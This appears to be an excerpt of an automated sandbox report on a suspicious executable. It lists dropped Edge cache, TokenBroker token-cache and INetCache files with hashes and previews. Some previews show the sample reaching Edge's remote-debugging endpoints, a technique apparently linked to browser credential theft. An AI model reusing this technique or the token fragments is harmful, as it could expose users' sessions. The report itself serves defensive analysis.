                                                                                                                                                                                                                                                                        SHA1:A2134120D4712C7C629CDCEEF9DE6D6E48CA13FA
                                                                                                                                                                                                                                                                        SHA-256:3D6F3F8F1456D7CE78DD9DFA8187318B38E731A658E513F561EE178766E74D39
                                                                                                                                                                                                                                                                        SHA-512:4B473F45A5D45D420483EA1D9E93047794884F26781BBFE5370A554D260E80AD462E7EEB74D16025774935C3A80CBB2FD1293941EE3D7B64045B791B365F2B63
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:uriCache_

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache_

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):179
                                                                                                                                                                                                                                                                        Entropy (8bit):5.018771593779723
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:YTyLSmafBoTfIeRDHtDozRLuLgfGBkGAeekVy8HfzXNPIAclQadWSGXy:YWLSGTt1o9LuLgfGBPAzkVj/T8lQ0Ay
                                                                                                                                                                                                                                                                        MD5:60ABDED46474313F38B9CD9B716D7E78
                                                                                                                                                                                                                                                                        SHA1:DD2C6DD1B0A1786EE691F512B4D341E4C76C0D68
                                                                                                                                                                                                                                                                        SHA-256:A498F503FDB10A5B7CF1935321C4A414CCCAF0893FA54B367806DD6E80BDEB39
                                                                                                                                                                                                                                                                        SHA-512:E0EA118D3699AE53358C444DB278F8C9419AB819D7A8D6E2CB50B54FA83254AAD5EEA88CB65FC240F2F0AF852A07D7793DD25F0884D359DEF14A9647F04C0503
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{"version":1,"cache_data":[{"file_hash":"da2d278eafa98c1f","server_context":"1;f94c025f-7523-6972-b613-ce2c246c55ce;unkn:100;0.01","result":1,"expiration_time":1735384837357132}]}

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Variations

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):86
                                                                                                                                                                                                                                                                        Entropy (8bit):4.3751917412896075
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:YQ3JYq9xSs0dMEJAELJ2rjozQw:YQ3Kq9X0dMgAEwj2
                                                                                                                                                                                                                                                                        MD5:16B7586B9EBA5296EA04B791FC3D675E
                                                                                                                                                                                                                                                                        SHA1:8890767DD7EB4D1BEAB829324BA8B9599051F0B0
                                                                                                                                                                                                                                                                        SHA-256:474D668707F1CB929FEF1E3798B71B632E50675BD1A9DCEAAB90C9587F72F680
                                                                                                                                                                                                                                                                        SHA-512:58668D0C28B63548A1F13D2C2DFA19BCC14C0B7406833AD8E72DFC07F46D8DF6DED46265D74A042D07FBC88F78A59CB32389EF384EC78A55976DFC2737868771
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{"user_experience_metrics.stability.exited_cleanly":false,"variations_crash_streak":2}

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\b77491ad-dd27-4bfa-931d-96aebc05c68b.tmp

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):45618
                                                                                                                                                                                                                                                                        Entropy (8bit):6.087246311279642
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:768:eMkbJrT8IeQc5d9f3TVuFUhDO6vP6Olesg+ExLVyAbVdGNCAoYGoup1Xl3jVzXr/:eMk1rT8H19fjy6eLVnh8NRoYhu3VlXr/
                                                                                                                                                                                                                                                                        MD5:ED9EA7088A20DA5BDDF686390CFED7FA
                                                                                                                                                                                                                                                                        SHA1:3F2FD8FBFA5EE1C111AB2FE6928DD4183BACDA62
                                                                                                                                                                                                                                                                        SHA-256:A5B88D723578ED9B7561CC35A2AF2488DE47B68C436121F6834253080FEB14E6
                                                                                                                                                                                                                                                                        SHA-512:E63968AC6A027B6673FDDA993C5C9B1BD127E27735404E7E8E01528FFC189E28CD2352A1F77F0990D053FD0ABDF6DBFE1CB8E9DE4E28B80669C9C32A080D1738
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1735284036"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNor

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\d577120e-5a64-4eb7-9851-a859cd59c0c3.tmp

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):44694
                                                                                                                                                                                                                                                                        Entropy (8bit):6.095942255868158
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4xkB6wu9hDO6vP6Olesg+ExLcGoup1Xl3jVzXr4CCAo1:z/Ps+wsI7yOET6eLchu3VlXr4CRo1
                                                                                                                                                                                                                                                                        MD5:906F93676DAA44F0FA7D00A2BE11679E
                                                                                                                                                                                                                                                                        SHA1:8D3E2AE89CF708FB9B42C1B126716F763A744AD5
                                                                                                                                                                                                                                                                        SHA-256:7389B2AFB2EBEB5C0B6EBFB04A33C671FAEE1CF71D6EDE9950572D3B1937E93D
                                                                                                                                                                                                                                                                        SHA-512:A2089F4FE0C6662BF7FAA654A4F1B2841008A9180FDCE1A7D393897A3C8215FE96C149B9E3D988C4E6CE75457F2067F0C648CEBFE2FE82DDE1BD96EEB37EE9EB
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\e44f588e-b0c5-45f0-aaaf-a034894cfad8.tmp

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):45571
                                                                                                                                                                                                                                                                        Entropy (8bit):6.087376109167888
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:768:eMkbJrT8IeQc5d9fBTVuFUhDO6vP6Olesg+ExLVyAbVdGNCAoYGoup1Xl3jVzXr/:eMk1rT8H19fty6eLVnh8NRoYhu3VlXr/
                                                                                                                                                                                                                                                                        MD5:52DF48E2282645222F65F1982888C367
                                                                                                                                                                                                                                                                        SHA1:E7F364055804E2744D44C8FBFF6D2191E71E8E15
                                                                                                                                                                                                                                                                        SHA-256:FFAAA0EE9D04FDD8A82B5F4301DFEF5ECA81691B78DE7D0DF6A3D8BE456B2982
                                                                                                                                                                                                                                                                        SHA-512:94999817173D180B14C6EAF54A38496EF1D7D318D23E87ED987423A5BC3A8ED6DF3B6C3E999E94B98F815C249BF3B3D0EA019FC35E67638D685834E7BF62C6EF
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1735284036"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNor

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\e55ddda1-a1ab-4ef6-81c8-2f37a9870121.tmp

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):45695
                                                                                                                                                                                                                                                                        Entropy (8bit):6.0871918470127095
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:768:eMkbJrT8IeQc5F9f3TVuFUhDO6vP6OZesg+ExLVyAbVdGNCAoYGoup1Xl3jVzXr/:eMk1rT8Ht9fjy6SLVnh8NRoYhu3VlXr/
                                                                                                                                                                                                                                                                        MD5:0C3D3AD26FA5969F659E6AACC4836A7E
                                                                                                                                                                                                                                                                        SHA1:9D140BED5C0DFDDB997A8C5EA072F38E46644643
                                                                                                                                                                                                                                                                        SHA-256:DA1CC66D12D447FC02D4C9561B04FA524D221507202F93F5B531CC3FF8AA9F0C
                                                                                                                                                                                                                                                                        SHA-512:8E889A18616ED5349C83A612424117DE67192EAB4F42E23E3CDC8B3083154BEEEEC31818EC9A0E21D5A523670F10EE6822AD677BFC5DECF2DDFF9EF342E79F7C
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1735284036"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNor

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):2278
                                                                                                                                                                                                                                                                        Entropy (8bit):3.855440061169542
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:uiTrlKxrgx8xl9Il8uglUglzDl8BN0pkRzd1rc:mhYmlUglzDlzpkO
                                                                                                                                                                                                                                                                        MD5:AF3BCFDFC9ED105E26AAFE2A7C4E5598
                                                                                                                                                                                                                                                                        SHA1:390C272BF3A62C2A3D886FBA1DFCC9C7D893E5FA
                                                                                                                                                                                                                                                                        SHA-256:AAF73A2555B26DBA38F87A532C7042BD0CA4DB2DB90C6C55C67EBCA3CFD0BB47
                                                                                                                                                                                                                                                                        SHA-512:C54723AA2E3C3E5D2F4D77B42642F3E1F41BB3F8B09DBC75F2FB6E9673FE796C1252C90FFA263A9CAF9079F0DF71FA62AAD1CA51CDA4895D3134FA25ACFAC038
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".W.i.p.w.W.M.+.N.H.l.b.C.D.m.s.Z.p.8.S.O.s.j.h.t.F.B.s.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.G.K.D.N.D.h.Y.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.D.h.Z.6.+.q.

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\cf7513a936f7effbb38627e56f8d1fce10eb12cc.tbres

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):4622
                                                                                                                                                                                                                                                                        Entropy (8bit):3.998100292656711
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:WcYmlpaaZNkUz8Zw01gUMn6S6wuDQh9yBp4LR:WcxpaaZN1AZpR86SqDs9SpWR
                                                                                                                                                                                                                                                                        MD5:83D31132FA3DD162290FF7D42C843508
                                                                                                                                                                                                                                                                        SHA1:BE51EEDFCBF1A1A2AAE97F41DA6325EDE3DBD995
                                                                                                                                                                                                                                                                        SHA-256:373C23B2B17BAACF986BF1E0324D29FC5B35639DAD58CA0A3C34B94D24040FE6
                                                                                                                                                                                                                                                                        SHA-512:FF722A80A6586262935833C9200AE7042CABF48D7D7CF13CF67CC8578C6E721DE4F8BEE9800CE0E63085E98147B30612D15A282F8DFF2518D4F43F2D86BF3B49
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".z.3.U.T.q.T.b.3.7./.u.z.h.i.f.l.b.4.0.f.z.h.D.r.E.s.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".x.2.p./.G.T.B.Y.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.D.h.Z.6.+.q.

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\e8ddd4cbd9c0504aace6ef7a13fa20d04fd52408.tbres

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):2684
                                                                                                                                                                                                                                                                        Entropy (8bit):3.9013039727875722
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:uiTrlKx68Wa7x2Xxl9Il8uglJbjaJBq+CznCgUYCuKTFQFig+ZqQnXqzslAJT/dc:aQjYmlJbjCOzCUCsEg+qQn6wlAJTa
                                                                                                                                                                                                                                                                        MD5:A5A60308CD6D771E79BDE9B21AE89F4D
                                                                                                                                                                                                                                                                        SHA1:785BA7317FEEE879582437C255096220E7381447
                                                                                                                                                                                                                                                                        SHA-256:05EB789870AF6F9E70AD0D87EEEBF3F731C33AD9DC243F63D365725F87752B76
                                                                                                                                                                                                                                                                        SHA-512:884985B4E65868DE4F36AE6A960E13A5031CFF01A409D42DF5C4D09BB95AB5368811A447A5977A773DE22899916D1AA645036477BE68AB9AB805D6BEC997C695
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".6.N.3.U.y.9.n.A.U.E.q.s.5.u.9.6.E./.o.g.0.E./.V.J.A.g.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".o.B.K.d.S.g.F.3.3.A.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.D.h.Z.6.+.q.

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\json[1].json

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\aD7D9fkpII.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):3500
                                                                                                                                                                                                                                                                        Entropy (8bit):5.395829667163846
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:6NnCWHCpNnC0bCQkNnC1Zg9C1SkNnCxzTdgECxdNnCuxRCu2NnCNEHDCNWNnCUws:6NSN/kNoZBSkNgzTedNNxz2NTdNF5Nn
                                                                                                                                                                                                                                                                        MD5:EA4BC37C01F7A80ECAEF4013F4792C25
                                                                                                                                                                                                                                                                        SHA1:64A87C8F921D9AE60AD752A32AF1D39752D71AA0
                                                                                                                                                                                                                                                                        SHA-256:CA4B5C1F4C2F3A03F2DB52D2CC4F0938F4D1F50302B92EA53A62E818B31F8CDB
                                                                                                                                                                                                                                                                        SHA-512:26A5CA07E161E08FBE71BA0ADF5BD4ACE5ED05EC41DDA5886BC9129838BEF82FFF4AB24DC1AA6CB7F25EC38F7FBCDCDA3EB565C65C86FB41D3AF1C5BE5ECD530
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/2BD24FC759A951DFD48958629664F3E7",.. "id": "2BD24FC759A951DFD48958629664F3E7",.. "title": "Microsoft Voices",.. "type": "background_page",.. "url": "chrome-extension://jdiccldimpdaibmpdkjnbmckianbfold/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/2BD24FC759A951DFD48958629664F3E7"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/B88A333656CDD33069A67A07FD52A11A",.. "id": "B88A333656CDD33069A67A07FD52A11A",.. "title": "WebRTC Internals Extension",.. "type": "background_page",.. "url": "chrome-extension://ncbjelpjchkpbikbpkcchkhkblodoama/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/B88A333656CDD33069A67A07FD52A11A"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\json[1].json

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\aD7D9fkpII.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1787
                                                                                                                                                                                                                                                                        Entropy (8bit):5.378558717235696
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:SfNaoCURwTECUUfNaoC4llC4ofNaoCZCPfNaoCR0UrU0U8Cx:6NnCFTECxNnC4llC40NnCZCnNnCR0UrM
                                                                                                                                                                                                                                                                        MD5:5D5E3E04FFCF3668517B3FBBCF4EA97B
                                                                                                                                                                                                                                                                        SHA1:E0146249A719BFEEF04F4D1B92FE9F56D733653E
                                                                                                                                                                                                                                                                        SHA-256:5F45AC1E9E033EC3654E14EFB5D2357688BF8D57F18991B73AD938E45D1AE9A3
                                                                                                                                                                                                                                                                        SHA-512:8111149F0DDC0B3769D0D732808DB5A12B9F8F33B4CD236A4E73E4748B16E23963F8C4BAF1FA5D1881D1942864E403F92BAC627EA5E8C13887E1EB787A98012F
                                                                                                                                                                                                                                                                        Malicious:false
